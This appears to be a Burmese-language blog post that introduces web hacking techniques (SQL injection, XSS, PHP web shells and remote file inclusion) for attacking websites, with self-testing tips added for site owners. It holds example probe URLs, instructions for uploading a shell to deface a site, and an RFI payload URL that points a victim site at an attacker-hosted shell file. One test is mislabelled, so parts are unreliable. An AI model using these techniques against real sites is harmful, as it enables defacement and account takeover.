Web Hacking

က်ေနာ္က ဘယ္ website မဆို hack ဖို႔အတြက္ hacker ေတြကို အကူအညီေပးႏိုင္တဲ႔

အသံုးျပဳမႈအမ်ားဆံုးျဖစ္တဲ႔ web hacking နည္းပညာ အခ်ိဳ႕ ကို

ေဆြးေႏြးေပးသြားပါမယ္။ တဘက္ကၾကည့္ရင္လည္း ဒါဟာ သင္ site ကို

ကာကြယ္ဖို႔အတြက္ ကူညီပါလိမ့္မယ္။

(က)SQL Injection

( ခ ) XSS

( ဂ) Shells

(ဃ) RFI

( င ) ေနာက္ထပ္အမ်ားၾကီး ရွိပါေသးတယ္။ ဒါေပမယ့္ ဒီမွာေတာ့ အသံုးျပဳမႈအမ်ားဆံုးျဖစ္တာကိုပဲ ေဆြးေႏြးသြားမွာ ျဖစ္ပါတယ္။

(က) SQL Injection

ယေန႔အခ်ိန္အခါမွာ website အမ်ားစုဟာ SQL Database တစ္ခုနဲ႔ connect လုပ္ထားၾကပါတယ္။ SQL

Databaseက သူတို႔ရဲ႕ website သို႔ လာေရာက္လာပတ္သူက register

လုပ္သြားတဲ႔အခါ username နဲ႔ password ေတြ ( encrypt လုပ္ျပီး )ကို

သိမ္းဆည္းထားဖို႔အတြက္ သူတို႔ကို ကူညီပါတယ္။ SQL database က user တစ္ေယာက္

logs in လုပ္တဲ႔ အခါတိုင္းမွာ ေမးခြန္းေတြေမးျမန္းတဲ႔ အလုပ္ငန္းစဥ္ကို

လုပ္ေဆာင္ပါတယ္။ ၄င္းတို႔ database ဆီသြားျပီး မွန္ကန္ေသခ်ာတဲ႔ password

ဟုတ္မဟုတ္ ၾကည့္ပါတယ္။ အကယ္၍ မွန္ကန္တယ္ဆုိရင္ေတာ့ user ကို log in

လိုက္ပါတယ္၊ မမွန္ဘူးဆိုရင္ေတာ့ error တစ္ခုကို ေပးပါလိမ့္မယ္။ ဒါေၾကာင့္

အေျခခံေဆာင္ရြက္ခ်က္ကေတာ့ database မွာရွိတဲ႔ internet information ကုိ

အသံုးခ်ဖို႔ၾကိဳးစားျပီး database ထဲမွာရွိတဲ႔ database ထဲမွာ

ေမးခြန္းတစ္ခုကို စစ္ေဆးဖို႔ command တစ္ခုကို

လိုက္နာေဆာင္ရြက္ေနျခင္းျဖစ္ပါတယ္။ ဒီနည္းလမ္းနဲ႔ ပတ္သတ္ျပီး ဒီ post

ထဲမွာ ထည့္သြင့္ဖို႔ဆိုတာ တကယ့္ကို မျဖစ္ႏိုင္ပါဘူး။ ဘာေၾကာင့္လဲဆိုေတာ့

ဒီနည္းလမ္းဟာ website ကို hack ဖို႔အတြက္ နည္းလမ္းေတြထဲမွာ အရႈပ္ေထြး

အခက္ခဲဆံုးနည္းလမ္းတစ္ခု ျဖစ္လို႔ပါ။

သင့္ရဲ႕ website မွာ RFI attach လုပ္ဖို႔ အားနည္းခ်က္ရွိလား မရွိလားဆိုတာကို သိခ်င္ရင္ ေအာက္ပါအတိုင္းျပဳလုပ္ပါ…

အကယ္၍ သင့္ site ရဲ႕ URL က….

yoursite.com/index.php?id=545

ျဖစ္ေနတယ္ဆိုရင္ ၄င္းရဲ႕ အဆံုးမွာ ( ‘ ) ကို ေအာက္မွာ ျပထားသလိုမ်ိဳး ေပါင္းထည့္ေပးပါ…

yoursite.com/index.php?id=545′

( ခ ) XSS

XSS ကေတာ့ အခ်ိဳ႕ website ေတြကို hack ဖို႔အတြက္ ေကာင္းမြန္တဲ႔

အျခားနည္းလမ္းတစ္ခုလို႔ ဆိုႏိုင္ပါတယ္။ အခ်ိဳ႕ website/ forum ေတြက post (

သို႔ ) ေဆာင္းပါး ေတြထဲမွာ HTML ခြင့္ျပဳခဲ႔မယ္ဆိုရင္ hacker က content

ထဲကို အႏၲရာယ္ရွိတဲ႔ script ေတြကို post လုပ္ႏိုင္ပါတယ္။ ဒါေၾကာင့္

ဘယ္အခ်ိန္မဆို user တစ္ေယာက္က page ကုိဖြင့္လိုက္တုိင္း cookieေတြက hacker

ဆီကိုေပးပို႔ပါလိမ့္မယ္။ ဒီအတြက္ သူက user ကဲ႔သို႔ log in လုပ္ႏိုင္ျပီး

website ကို #$%@# လုပ္ပါေတာ့တယ္။

( ဂ ) Shells

Shell ဆိုတာကေတာ့ အႏၲရာယ္ရွိတဲ႔ .php script ျဖစ္ပါတယ္။ ၄င္းကိုဘယ္လိုလုပ္ရမလဲ ဆိုေတာ့ avaters, recepie, tricks , feedbacks ကဲ႔သို႔ေသာ ဘယ္ဖိုင္မဆို upload လုပ္ႏိုင္တဲ႔

website တစ္ခုခုမွာ ေနရာ တစ္ခု ရွာပါ။ ျပီးရင္ သင့္ရဲ႕ shell file ကို

အဲဒီထဲကို upload လုပ္ႏိုင္ဖို႔ၾကိဳးစားပါ။ upload ျပီးသြားရင္ ၄င္းကို

URL bar မွာဖြင့္ပါ။ အဲဒီ webhosting ရဲ႕ FTP account တစ္ခုလံုးကို သင္

ျမင္ရပါလိမ့္မယ္။ index page ထဲဲမွာပါ၀င္သမွ်ကို သင့္စိတ္ၾကိဳက္

rename/Edit/upload/download ၾကိဳက္သလိုလုပ္လို႔ရပါျပီ။

အခုလိုျပဳလုပ္ျခင္းကို deface လို႔လည္း ေခၚပါတယ္။

(ဃ) RFI

RFI ကလည္း website တစ္ခုကို deface လုပ္ဖို႔အတြက္ ေကာင္းတဲ့နည္းလမ္းတစ္ခုပဲ

ျဖစ္ပါတယ္။ ၄င္းကို shell နဲ႔အတူအသံုးျပဳရမွာ ျဖစ္ပါတယ္။ ၄င္းကို သင့္ရဲ႕

shell ေပၚမွာ upload လုပ္ျပီးျပီး ဆုိရင္ သင့္ကိုအေထာက္အကူေပးပါလိမ့္မယ္…

yoursite.com/shell.txt

သင္က RFT သို႔ အားနည္းခ်က္ရွိတဲ႔ site တစ္ခုကို ရွာေတြ႔ရပါမယ္… အဲဒီေနာက္ ေအာက္မွာျပထားတဲ႔ အတိုင္း ျပဳလုပ္ႏိုင္ပါတယ္…

victimssite.com/index.php?page=yousite.com/shell.txt

ဒီဟာက သင့္ကို သင့္သားေကာင္ရဲ႕ sites FTP ၀င္လမ္း ကုိ ထပ္ေပးပါလိမ့္မယ္။ shell မွာလိုပဲ သင္ၾကိဳက္သလို သင့္စိတ္ၾကိဳက္

လုပ္လို႔ရပါျပီ။

အကယ္၍ သင္က သင့္ website က RFI attach လုပ္ဖို႔ အားနည္းခ်က္ ရွိလား မရွိဘူးလားဆိုတာကို စစ္ေဆးခ်င္ရင္ ေအာက္ပါအတိုင္း လုပ္ပါ…

အကယ္၍ သင့္ site ရဲ႕ URL က

yoursite.com/index.php?id=545

ျဖစ္ေနခဲ႔ရင္ ၄င္းရဲ႕ အဆံုးမွာ ေအာက္မွာျပထားတဲ႔ အတိုင္း ေပါင္းထည့္ေပးပါ…

yoursite.com/index.php?id=http://www.google.com

အကယ္၍ သင့္ page ထဲမွာ google page ပါ၀င္ေနမယ္ဆိုရင္ေတာ့ အဲဒီအဓိပၸာယ္က RFI သို႔ တြဲဆက္ျခင္းမွာ ေပ်ာ့ကြက္တစ္ခုျဖစ္ပါတယ္။